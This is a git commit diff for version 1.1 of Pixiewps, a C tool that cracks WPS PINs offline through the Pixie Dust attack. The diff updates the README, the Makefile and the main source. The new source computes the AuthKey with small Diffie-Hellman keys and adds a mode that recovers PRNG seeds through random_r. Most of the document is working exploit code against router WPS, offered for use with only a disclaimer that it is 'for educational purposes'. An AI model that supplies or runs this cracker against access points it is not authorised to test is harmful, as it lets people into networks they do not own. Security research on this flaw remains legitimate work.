Updated to 1.1

Finished previous attack's implementation. Added AuthKey computation
with small DH keys.
This commit is contained in:
wiire 2015-05-01 21:10:08 +02:00
parent 83a8760727
commit 1b1e376322
8 changed files with 1217 additions and 310 deletions

17
.gitattributes vendored
View File

@ -1,17 +1,2 @@
# Auto detect text files and perform LF normalization
# Perform LF normalization
* text=auto
# Custom for Visual Studio
*.cs diff=csharp
# Standard to msysgit
*.doc diff=astextplain
*.DOC diff=astextplain
*.docx diff=astextplain
*.DOCX diff=astextplain
*.dot diff=astextplain
*.DOT diff=astextplain
*.pdf diff=astextplain
*.PDF diff=astextplain
*.rtf diff=astextplain
*.RTF diff=astextplain

View File

@ -7,7 +7,7 @@ Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploitin
Pixiewps requires libssl. To install it:
```
sudo apt-get install libssl-dev
sudo apt-get install libssl-dev
```
# INSTALLATION
@ -15,9 +15,9 @@ Pixiewps requires libssl. To install it:
Pixiewps can be built and installed by running:
```
~/pixiewps$ cd src
~/pixiewps/src$ make
~/pixiewps/src$ sudo make install
~/pixiewps$ cd src
~/pixiewps/src$ make
~/pixiewps/src$ sudo make install
```
# USAGE
@ -27,16 +27,78 @@ Pixiewps can be built and installed by running:
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : E-Hash1
-z, --e-hash2 : E-Hash2
-a, --authkey : Key used in HMAC SHA-256
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce
-S, --dh-small : Small Diffie-Hellman keys (--pkr not needed)
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
```
-h, --help : Display this usage screen
```
# DESCRIPTION OF ARGUMENTS
```
-e, --pke
Enrollee's DH public key, found in M1.
-r, --pkr
Registrar's DH public key, found in M2 or can be avoided by specifying
small Diffie-Hellman keys in both Reaver and Pixiewps.
-s, --e-hash1
Enrollee Hash-1, found in M3.
-z, --e-hash2
Enrollee Hash-2, found in M3.
-a, --authkey
Registration Protocol authentication session key. Although for this parameter a
modified version of Reaver or Bully is needed, it can be avoided by specifying
small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce,
--r-nonce and --e-bssid.
-n, --e-nonce
Enrollee's nonce, found in M1.
-m, --r-nonce
Registrar's nonce, found in M2.
-b, --e-bssid
Enrollee's BSSID.
-S, --dh-small
Small Diffie-Hellman keys. The same option MUST be specified on Reaver
(1.3 or later versions) too.
-f, --force
Force Pixiewps to bruteforce the whole keyspace for mode 4.
It could take up to several minutes to complete.
-v, --verbosity
Verbosity level (1-3). Level 3 displays the most information.
-h, --help
Display usage screen.
```

View File

@ -1,15 +1,17 @@
CC = gcc
CCFLAGS = -lssl -lcrypto -Wall -Werror
CCFLAGS = -std=c99
LDFLAGS = -lssl -lcrypto
TARGET = pixiewps
PREFIX = $(DESTDIR)/usr/local
BINDIR = $(PREFIX)/bin
all:
$(CC) -o $(TARGET) pixiewps.c $(CCFLAGS)
$(CC) $(CCFLAGS) -o $(TARGET) $(TARGET).c random_r.c $(LDFLAGS)
install:
install -D pixiewps $(BINDIR)/$(TARGET)
install -m 755 $(TARGET) $(BINDIR)
uninstall:
rm $(BINDIR)/$(TARGET)

View File

@ -5,7 +5,7 @@
* Special thanks to: datahead, soxrok2212
*
* Copyright (c) 2015, wiire <wi7ire@gmail.com>
* Version: 1.0.5
* Version: 1.1
*
* DISCLAIMER: This tool was made for educational purposes only.
* The author is NOT responsible for any misuse or abuse.
@ -40,86 +40,66 @@
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <getopt.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <getopt.h>
#include <openssl/hmac.h>
#include <sys/time.h>
#include <asm/byteorder.h>
/* WPS constants */
#define PK_LEN 192
#define AUTHKEY_LEN 32
#define HASH_LEN 32
#define NONCE_LEN 16
#define ES_LEN 16
#define PSK_LEN 16
#include "pixiewps.h"
#include "random_r.h"
#include "utils.h"
/* LCG constants */
#define LCG_MULTIPLIER 1103515245
#define LCG_INCREMENT 12345
#define LCG_OPT_MASK 0x01ffffff
/* Exit costants */
#define MEM_ERROR 2
#define ARG_ERROR 3
typedef enum {false = 0, true = 1} bool;
int hex_string_to_byte_array(unsigned char *src, unsigned char *dst, int dst_len);
void uint_to_char_array(unsigned int num, int len, unsigned char *dst);
unsigned int wps_pin_checksum(unsigned int pin);
unsigned int wps_pin_valid(unsigned int pin);
void hmac_sha256(const void *key, int key_len, const unsigned char *data, size_t data_len, unsigned char *digest);
int rand_r(unsigned int *seed);
void byte_array_print(unsigned char *buffer, unsigned int length);
void display_usage();
static const long hextable[] = {
[0 ... 255] = -1,
['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
['A'] = 10, 11, 12, 13, 14, 15,
['a'] = 10, 11, 12, 13, 14, 15
};
struct globalArgs_t {
unsigned char *pke;
unsigned char *pkr;
unsigned char *e_hash1;
unsigned char *e_hash2;
unsigned char *authkey;
unsigned char *e_nonce;
bool small_dh_keys;
} globalArgs;
static const char *option_string = "e:r:s:z:a:n:Sh?";
int32_t rand_r(uint32_t *seed);
static const char *option_string = "e:r:s:z:a:n:m:b:Sfv:h?";
static const struct option long_options[] = {
{ "pke", required_argument, 0, 'e' },
{ "pkr", required_argument, 0, 'r' },
{ "e-hash1", required_argument, 0, 's' },
{ "e-hash2", required_argument, 0, 'z' },
{ "authkey", required_argument, 0, 'a' },
{ "e-nonce", required_argument, 0, 'n' },
{ "dh-small", no_argument, 0, 'S' },
{ "help", no_argument, 0, 'h' },
{ 0, 0, 0, 0 }
{ "pke", required_argument, 0, 'e' },
{ "pkr", required_argument, 0, 'r' },
{ "e-hash1", required_argument, 0, 's' },
{ "e-hash2", required_argument, 0, 'z' },
{ "authkey", required_argument, 0, 'a' },
{ "e-nonce", required_argument, 0, 'n' },
{ "r-nonce", required_argument, 0, 'm' },
{ "e-bssid", required_argument, 0, 'b' },
{ "dh-small", no_argument, 0, 'S' },
{ "force", no_argument, 0, 'f' },
{ "verbosity", required_argument, 0, 'v' },
{ "help", no_argument, 0, 'h' },
{ 0, 0, 0, 0 }
};
int main(int argc, char **argv) {
globalArgs.pke = 0;
globalArgs.pkr = 0;
globalArgs.e_hash1 = 0;
globalArgs.e_hash2 = 0;
globalArgs.authkey = 0;
globalArgs.e_nonce = 0;
globalArgs.small_dh_keys = false;
unsigned char *pke;
unsigned char *pkr;
unsigned char *e_hash1;
unsigned char *e_hash2;
unsigned char *authkey;
unsigned char *e_nonce = 0;
struct global *wps;
if ((wps = calloc(1, sizeof(struct global)))) {
wps->pke = 0;
wps->pkr = 0;
wps->e_hash1 = 0;
wps->e_hash2 = 0;
wps->authkey = 0;
wps->e_nonce = 0;
wps->r_nonce = 0;
wps->e_bssid = 0;
wps->psk1 = 0;
wps->psk2 = 0;
wps->dhkey = 0;
wps->kdk = 0;
wps->wrapkey = 0;
wps->emsk = 0;
wps->e_s1 = 0;
wps->e_s2 = 0;
wps->bruteforce = false;
wps->verbosity = 2;
wps->error = calloc(256, 1); if (!wps->error) goto memory_err;
wps->error[0] = '\n';
} else {
memory_err:
fprintf(stderr, "\n [X] Memory allocation error!\n");
return MEM_ERROR;
}
int opt = 0;
int long_index = 0;
@ -128,127 +108,260 @@ int main(int argc, char **argv) {
while (opt != -1) {
switch (opt) {
case 'e':
globalArgs.pke = (unsigned char *) optarg;
wps->pke = malloc(WPS_PUBKEY_LEN);
if (!wps->pke)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->pke, WPS_PUBKEY_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad enrollee public key -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'r':
globalArgs.pkr = (unsigned char *) optarg;
wps->pkr = malloc(WPS_PUBKEY_LEN);
if (!wps->pkr)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->pkr, WPS_PUBKEY_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad registrar public key -- %s\n\n", optarg);
goto usage_err;
}
break;
case 's':
globalArgs.e_hash1 = (unsigned char *) optarg;
wps->e_hash1 = malloc(WPS_HASH_LEN);
if (!wps->e_hash1)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->e_hash1, WPS_HASH_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'z':
globalArgs.e_hash2 = (unsigned char *) optarg;
wps->e_hash2 = malloc(WPS_HASH_LEN);
if (!wps->e_hash2)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->e_hash2, WPS_HASH_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'a':
globalArgs.authkey = (unsigned char *) optarg;
wps->authkey = malloc(WPS_AUTHKEY_LEN);
if (!wps->authkey)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->authkey, WPS_HASH_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad authentication session key -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'n':
globalArgs.e_nonce = (unsigned char *) optarg;
wps->e_nonce = malloc(WPS_NONCE_LEN);
if (!wps->e_nonce)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->e_nonce, WPS_NONCE_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad enrollee nonce -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'm':
wps->r_nonce = malloc(WPS_NONCE_LEN);
if (!wps->r_nonce)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->r_nonce, WPS_NONCE_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad registrar nonce -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'b':
wps->e_bssid = malloc(WPS_BSSID_LEN);
if (!wps->e_bssid)
goto memory_err;
if (hex_string_to_byte_array(optarg, wps->e_bssid, WPS_BSSID_LEN)) {
snprintf(wps->error, 256, "\n [!] Bad enrollee MAC address -- %s\n\n", optarg);
goto usage_err;
}
break;
case 'S':
globalArgs.small_dh_keys = true;
wps->small_dh_keys = true;
break;
case 'f':
wps->bruteforce = true;
break;
case 'v':
if (get_int(optarg, &wps->verbosity) != 0 || wps->verbosity < 1 || 3 < wps->verbosity) {
snprintf(wps->error, 256, "\n [!] Bad verbosity level -- %s\n\n", optarg);
goto usage_err;
};
break;
case 'h':
goto usage_err;
case '?':
display_usage();
default:
exit(ARG_ERROR);
fprintf(stderr, "%s -h for help\n", argv[0]);
return ARG_ERROR;
}
opt = getopt_long(argc, argv, option_string, long_options, &long_index);
}
/* Not all required arguments have been supplied */
if (globalArgs.pke == 0 || globalArgs.e_hash1 == 0 || globalArgs.e_hash2 == 0 || globalArgs.authkey == 0) {
display_usage();
if (wps->pke == 0 || wps->e_hash1 == 0 || wps->e_hash2 == 0) {
wps->error = "\n [!] Not all required arguments have been supplied!\n\n";
usage_err:
fprintf(stderr, usage, VERSION, argv[0], wps->error);
return ARG_ERROR;
}
/* If --dh-small is selected then no PKR should be supplied */
if ((globalArgs.pkr && globalArgs.small_dh_keys) || (!globalArgs.pkr && !globalArgs.small_dh_keys)) {
display_usage();
/* If --dh-small is selected then no --pkr should be supplied */
if (wps->pkr && wps->small_dh_keys) {
wps->error = "\n [!] Options --dh-small and --pkr are mutually exclusive!\n\n";
goto usage_err;
}
/* Allocating memory */
pke = (unsigned char *) malloc(PK_LEN); if (!pke) exit(MEM_ERROR);
pkr = (unsigned char *) malloc(PK_LEN); if (!pkr) exit(MEM_ERROR);
e_hash1 = (unsigned char *) malloc(HASH_LEN); if (!e_hash1) exit(MEM_ERROR);
e_hash2 = (unsigned char *) malloc(HASH_LEN); if (!e_hash2) exit(MEM_ERROR);
authkey = (unsigned char *) malloc(AUTHKEY_LEN); if (!authkey) exit(MEM_ERROR);
if (globalArgs.e_nonce) {
e_nonce = (unsigned char *) malloc(NONCE_LEN); if (!e_nonce) exit(MEM_ERROR);
if (hex_string_to_byte_array(globalArgs.e_nonce, e_nonce, NONCE_LEN)) goto end;
/* Either --pkr or --dh-small must be specified */
if (!wps->pkr && !wps->small_dh_keys) {
wps->error = "\n [!] Either --pkr or --dh-small must be specified!\n\n";
goto usage_err;
}
if (globalArgs.small_dh_keys) {
memset(pkr, 0, PK_LEN - 1);
pkr[PK_LEN - 1] = 0x02;
} else {
if (hex_string_to_byte_array(globalArgs.pkr, pkr, PK_LEN)) goto end;
if (wps->small_dh_keys) { /* Small DH keys selected */
wps->pkr = malloc(WPS_PUBKEY_LEN);
if (!wps->pkr)
goto memory_err;
/* g^A mod p = 2 (g = 2, A = 1, p > 2) */
memset(wps->pkr, 0, WPS_PUBKEY_LEN - 1);
wps->pkr[WPS_PUBKEY_LEN - 1] = 0x02;
if (!wps->authkey) {
if (wps->e_nonce) {
if (wps->r_nonce) {
if (wps->e_bssid) { /* Computing AuthKey */
wps->dhkey = malloc(WPS_HASH_LEN);
if (!wps->dhkey)
goto memory_err;
wps->kdk = malloc(WPS_HASH_LEN);
if (!wps->kdk)
goto memory_err;
unsigned char *buffer = malloc(WPS_NONCE_LEN * 2 + WPS_BSSID_LEN);
if (!buffer)
goto memory_err;
/* DHKey = SHA-256(g^(AB) mod p) = SHA-256(PKe^A mod p) = SHA-256(PKe) (g = 2, A = 1, p > 2) */
sha256(wps->pke, WPS_PUBKEY_LEN, wps->dhkey);
memcpy(buffer, wps->e_nonce, WPS_NONCE_LEN);
memcpy(buffer + WPS_NONCE_LEN, wps->e_bssid, WPS_BSSID_LEN);
memcpy(buffer + WPS_NONCE_LEN + WPS_BSSID_LEN, wps->r_nonce, WPS_NONCE_LEN);
/* KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce) */
hmac_sha256(wps->dhkey, WPS_HASH_LEN, buffer, WPS_NONCE_LEN * 2 + WPS_BSSID_LEN, wps->kdk);
buffer = realloc(buffer, WPS_HASH_LEN * 3);
if (!buffer)
goto memory_err;
/* Key derivation function */
kdf(wps->kdk, WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN + WPS_EMSK_LEN, buffer);
wps->authkey = malloc(WPS_AUTHKEY_LEN);
if (!wps->authkey)
goto memory_err;
memcpy(wps->authkey, buffer, WPS_AUTHKEY_LEN);
if (wps->verbosity > 2) {
wps->wrapkey = malloc(WPS_KEYWRAPKEY_LEN);
if (!wps->wrapkey)
goto memory_err;
wps->emsk = malloc(WPS_EMSK_LEN);
if (!wps->emsk)
goto memory_err;
memcpy(wps->wrapkey, buffer + WPS_AUTHKEY_LEN, WPS_KEYWRAPKEY_LEN);
memcpy(wps->emsk, buffer + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN, WPS_EMSK_LEN);
}
if (wps->verbosity < 3) {
free(wps->dhkey);
free(wps->kdk);
}
free(buffer);
} else {
wps->error = "\n [!] Neither --authkey and --e-bssid have been supplied!\n\n";
goto usage_err;
}
} else {
wps->error = "\n [!] Neither --authkey and --r-nonce have been supplied!\n\n";
goto usage_err;
}
} else {
wps->error = "\n [!] Neither --authkey and --e-nonce have been supplied!\n\n";
goto usage_err;
}
}
}
/* Converting data fed to the program to byte array */
if (hex_string_to_byte_array(globalArgs.pke, pke, PK_LEN)) goto end;
if (hex_string_to_byte_array(globalArgs.e_hash1, e_hash1, HASH_LEN)) goto end;
if (hex_string_to_byte_array(globalArgs.e_hash2, e_hash2, HASH_LEN)) goto end;
if (hex_string_to_byte_array(globalArgs.authkey, authkey, AUTHKEY_LEN)) goto end;
/* E-S1 = E-S2 = 0 */
wps->e_s1 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s1) goto memory_err;
wps->e_s2 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s2) goto memory_err;
/* Allocating memory for digests */
unsigned char *psk1 = (unsigned char *) malloc(HASH_LEN); if (!psk1) exit(MEM_ERROR);
unsigned char *psk2 = (unsigned char *) malloc(HASH_LEN); if (!psk2) exit(MEM_ERROR);
unsigned char *result = (unsigned char *) malloc(HASH_LEN); if (!result) exit(MEM_ERROR);
unsigned char *buffer = (unsigned char *) malloc(ES_LEN + PSK_LEN + PK_LEN * 2); if (!buffer) exit(MEM_ERROR);
wps->psk1 = malloc(WPS_HASH_LEN); if (!wps->psk1) goto memory_err;
wps->psk2 = malloc(WPS_HASH_LEN); if (!wps->psk2) goto memory_err;
/* ES-1 = ES-2 = 0 */
unsigned char *e_s1 = (unsigned char *) calloc(ES_LEN, 1); if (!e_s1) exit(MEM_ERROR);
unsigned char *e_s2 = (unsigned char *) calloc(ES_LEN, 1); if (!e_s2) exit(MEM_ERROR);
unsigned char *result = (unsigned char *) malloc(WPS_HASH_LEN);
if (!result)
goto memory_err;
unsigned char *buffer = (unsigned char *) malloc(WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2);
if (!buffer)
goto memory_err;
unsigned int seed;
unsigned int print_seed = 0; /* Seed to display at the end */
uint32_t seed;
uint32_t print_seed; /* Seed to display at the end */
unsigned int first_half;
unsigned int second_half;
unsigned char s_pin[4] = {0};
bool valid = false;
int mode = 1; bool found = false;
struct timeval t0;
struct timeval t1;
struct timeval t0, t1;
gettimeofday(&t0, 0);
while (mode < 4 && !found) {
while (mode <= MAX_MODE && !found) {
first_half = 0;
second_half = 0;
seed = 0; print_seed = 0;
if (mode == 2 && e_nonce) {
memcpy(e_s1, e_nonce, NONCE_LEN);
memcpy(e_s2, e_nonce, NONCE_LEN);
/* ES-1 = ES-2 = E-Nonce */
if (mode == 2 && wps->e_nonce) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
}
/* PRNG bruteforce */
if (mode == 3 && e_nonce) {
/* PRNG bruteforce (rand_r) */
if (mode == 3 && wps->e_nonce) {
/* Reducing entropy from 32 to 25 bits */
unsigned int index = e_nonce[0] << 25;
unsigned int limit = index | LCG_OPT_MASK;
uint32_t index = wps->e_nonce[0] << 25;
uint32_t limit = index | 0x01ffffff;
while (1) {
seed = index;
int i;
for (i = 1; i < NONCE_LEN; i++) {
if (e_nonce[i] != (unsigned char) rand_r(&seed)) break;
for (i = 1; i < WPS_NONCE_LEN; i++) {
if (wps->e_nonce[i] != (unsigned char) rand_r(&seed)) break;
}
if (i == NONCE_LEN) { /* Seed found */
if (i == WPS_NONCE_LEN) { /* Seed found */
print_seed = seed;
/* Advance to get ES-1 */
for (i = 0; i < NONCE_LEN; i++)
e_s1[i] = (unsigned char) rand_r(&seed);
for (i = 0; i < WPS_SECRET_NONCE_LEN; i++)
wps->e_s1[i] = (unsigned char) rand_r(&seed);
/* Advance to get ES-2 */
for (i = 0; i < NONCE_LEN; i++)
e_s2[i] = (unsigned char) rand_r(&seed);
for (i = 0; i < WPS_SECRET_NONCE_LEN; i++)
wps->e_s2[i] = (unsigned char) rand_r(&seed);
break;
}
@ -259,18 +372,90 @@ int main(int argc, char **argv) {
}
}
/* PRNG bruteforce (random_r) */
if (mode == 4 && wps->e_nonce) {
/* Checks if the sequence may actually be generated by current random function */
if (wps->e_nonce[0] < 0x80 && wps->e_nonce[4] < 0x80 && wps->e_nonce[8] < 0x80 && wps->e_nonce[12] < 0x80) {
valid = true;
/* Converting enrollee nonce to the sequence may be generated by current random function */
uint32_t randr_enonce[4] = {0};
int j = 0;
for (int i = 0; i < 4; i++) {
randr_enonce[i] |= wps->e_nonce[j++];
randr_enonce[i] <<= 8;
randr_enonce[i] |= wps->e_nonce[j++];
randr_enonce[i] <<= 8;
randr_enonce[i] |= wps->e_nonce[j++];
randr_enonce[i] <<= 8;
randr_enonce[i] |= wps->e_nonce[j++];
}
uint32_t limit;
struct timeval curr_time;
gettimeofday(&curr_time, 0);
if (wps->bruteforce) {
seed = curr_time.tv_sec + SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2;
limit = 0;
} else {
seed = curr_time.tv_sec + SEC_PER_HOUR * 2;
limit = curr_time.tv_sec - SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2;
}
struct random_data *buf = (struct random_data *) calloc(1, sizeof(struct random_data));
char *rand_statebuf = (char *) calloc(1, 128);
initstate_r(seed, rand_statebuf, 128, buf);
int32_t res = 0;
while (1) {
srandom_r(seed, buf);
int i;
for (i = 0; i < 4; i++) {
random_r(buf, &res);
if (res != randr_enonce[i]) break;
}
if (i == 4) {
print_seed = seed;
srandom_r(print_seed + 1, buf);
for (int i = 0; i < 4; i++) {
random_r(buf, &res);
uint32_t be = __be32_to_cpu(res);
memcpy(&(wps->e_s1[4 * i]), &be, 4);
memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* ES-1 = ES-2 != E-Nonce */
}
}
if (print_seed || seed == limit) {
free(buf);
free(rand_statebuf);
break;
}
seed--;
}
}
}
/* WPS pin cracking */
if (mode == 1 || (mode == 2 && e_nonce) || (mode == 3 && print_seed)) {
if (mode == 1 || (mode == 2 && wps->e_nonce) || (mode == 3 && print_seed) || (mode == 4 && print_seed)) {
crack:
first_half = 0; second_half = 0;
while (first_half < 10000) {
uint_to_char_array(first_half, 4, s_pin);
hmac_sha256(authkey, AUTHKEY_LEN, (unsigned char *) s_pin, 4, psk1);
memcpy(buffer, e_s1, ES_LEN);
memcpy(buffer + ES_LEN, psk1, PSK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN, pke, PK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN + PK_LEN, pkr, PK_LEN);
hmac_sha256(authkey, AUTHKEY_LEN, buffer, ES_LEN + PSK_LEN + PK_LEN * 2, result);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk1);
memcpy(buffer, wps->e_s1, WPS_SECRET_NONCE_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk1, WPS_PSK_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);
if (memcmp(result, e_hash1, HASH_LEN)) {
if (memcmp(result, wps->e_hash1, WPS_HASH_LEN)) {
first_half++;
} else {
break;
@ -286,14 +471,14 @@ int main(int argc, char **argv) {
checksum_digit = wps_pin_checksum(first_half * 1000 + second_half);
c_second_half = second_half * 10 + checksum_digit;
uint_to_char_array(c_second_half, 4, s_pin);
hmac_sha256(authkey, AUTHKEY_LEN, (unsigned char *) s_pin, 4, psk2);
memcpy(buffer, e_s2, ES_LEN);
memcpy(buffer + ES_LEN, psk2, PSK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN, pke, PK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN + PK_LEN, pkr, PK_LEN);
hmac_sha256(authkey, AUTHKEY_LEN, buffer, ES_LEN + PSK_LEN + PK_LEN * 2, result);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2);
memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);
if (memcmp(result, e_hash2, HASH_LEN)) {
if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) {
second_half++;
} else {
second_half = c_second_half;
@ -315,14 +500,14 @@ int main(int argc, char **argv) {
}
uint_to_char_array(second_half, 4, s_pin);
hmac_sha256(authkey, AUTHKEY_LEN, (unsigned char *) s_pin, 4, psk2);
memcpy(buffer, e_s2, ES_LEN);
memcpy(buffer + ES_LEN, psk2, PSK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN, pke, PK_LEN);
memcpy(buffer + ES_LEN + PSK_LEN + PK_LEN, pkr, PK_LEN);
hmac_sha256(authkey, AUTHKEY_LEN, buffer, ES_LEN + PSK_LEN + PK_LEN * 2, result);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2);
memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);
if (memcmp(result, e_hash2, HASH_LEN)) {
if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) {
second_half++;
} else {
found = true;
@ -333,152 +518,105 @@ int main(int argc, char **argv) {
}
}
/* E-S1 = E-Nonce != E-S2 */
if (mode == 4 && print_seed && !found) {
memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
mode++;
goto crack;
}
mode++;
}
gettimeofday(&t1, 0);
long elapsed = t1.tv_sec - t0.tv_sec;
long elapsed_s = t1.tv_sec - t0.tv_sec;
mode--;
printf("\n Pixiewps %s\n", VERSION);
if (found) {
if (e_nonce && mode == 3) {
printf("\n [*] PRNG Seed: %u", print_seed);
if (wps->e_nonce) {
if ((mode == 3 || mode == 4) && wps->verbosity > 2) {
printf("\n [*] PRNG Seed: %u", print_seed);
}
if (mode == 4 && wps->verbosity > 2) {
time_t seed_time;
struct tm ts;
char buffer[30];
seed_time = print_seed;
ts = *localtime(&seed_time);
strftime(buffer, 30, "%c", &ts);
printf(" (%s)", buffer);
}
}
printf("\n [*] ES-1: ");
byte_array_print(e_s1, ES_LEN);
printf("\n [*] ES-2: ");
byte_array_print(e_s2, ES_LEN);
printf("\n [*] PSK1: ");
byte_array_print(psk1, PSK_LEN);
printf("\n [*] PSK2: ");
byte_array_print(psk2, PSK_LEN);
printf("\n [+] WPS pin: %04u%04u", first_half, second_half);
if (wps->verbosity > 2) {
if (wps->dhkey) { /* To see if AuthKey was supplied or not */
printf("\n [*] DHkey: "); byte_array_print(wps->dhkey, WPS_HASH_LEN);
printf("\n [*] KDK: "); byte_array_print(wps->kdk, WPS_HASH_LEN);
printf("\n [*] AuthKey: "); byte_array_print(wps->authkey, WPS_AUTHKEY_LEN);
printf("\n [*] EMSK: "); byte_array_print(wps->emsk, WPS_EMSK_LEN);
printf("\n [*] KeyWrapKey: "); byte_array_print(wps->wrapkey, WPS_KEYWRAPKEY_LEN);
}
printf("\n [*] PSK1: "); byte_array_print(wps->psk1, WPS_PSK_LEN);
printf("\n [*] PSK2: "); byte_array_print(wps->psk2, WPS_PSK_LEN);
}
if (wps->verbosity > 1) {
printf("\n [*] E-S1: "); byte_array_print(wps->e_s1, WPS_SECRET_NONCE_LEN);
printf("\n [*] E-S2: "); byte_array_print(wps->e_s2, WPS_SECRET_NONCE_LEN);
}
printf("\n [+] WPS pin: %04u%04u", first_half, second_half);
} else {
printf("\n [-] WPS pin not found!");
}
printf("\n\n [*] Time taken: %lu s\n\n", elapsed);
printf("\n\n [*] Time taken: %lu s\n\n", elapsed_s);
if (!found && mode == 4 && valid && !wps->bruteforce) {
printf(" [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.\n\n");
}
end:
free(pke);
free(pkr);
free(e_hash1);
free(e_hash2);
free(authkey);
free(psk1);
free(psk2);
free(result);
free(buffer);
free(e_s1);
free(e_s2);
if (e_nonce) free(e_nonce);
free(wps->pke);
free(wps->pkr);
free(wps->e_hash1);
free(wps->e_hash2);
free(wps->authkey);
free(wps->e_nonce);
free(wps->r_nonce);
free(wps->e_bssid);
free(wps->psk1);
free(wps->psk2);
free(wps->e_s1);
free(wps->e_s2);
free(wps->error);
if (wps->verbosity > 2) {
free(wps->dhkey);
free(wps->kdk);
free(wps->wrapkey);
free(wps->emsk);
}
free(wps);
return (!found); /* 0 success, 1 failure */
}
/* Converts an hex string to a byte array */
int hex_string_to_byte_array(unsigned char *src, unsigned char *dst, int dst_len) {
int i = 0;
unsigned char hvalue, lvalue;
while (i < dst_len) {
while (*src == ':' || *src == '-' || *src == ' ') src++; /* Keeps going until finds a good character */
hvalue = hextable[*src];
lvalue = hextable[*++src];
if (hvalue == -1 || lvalue == -1) return -1;
dst[i] = (hvalue << 4) | lvalue;
src++;
i++;
}
return 0;
}
/* Converts an unsigned integer to a char array without termination */
void uint_to_char_array(unsigned int num, int len, unsigned char *dst) {
unsigned int mul = 1;
while (len--) {
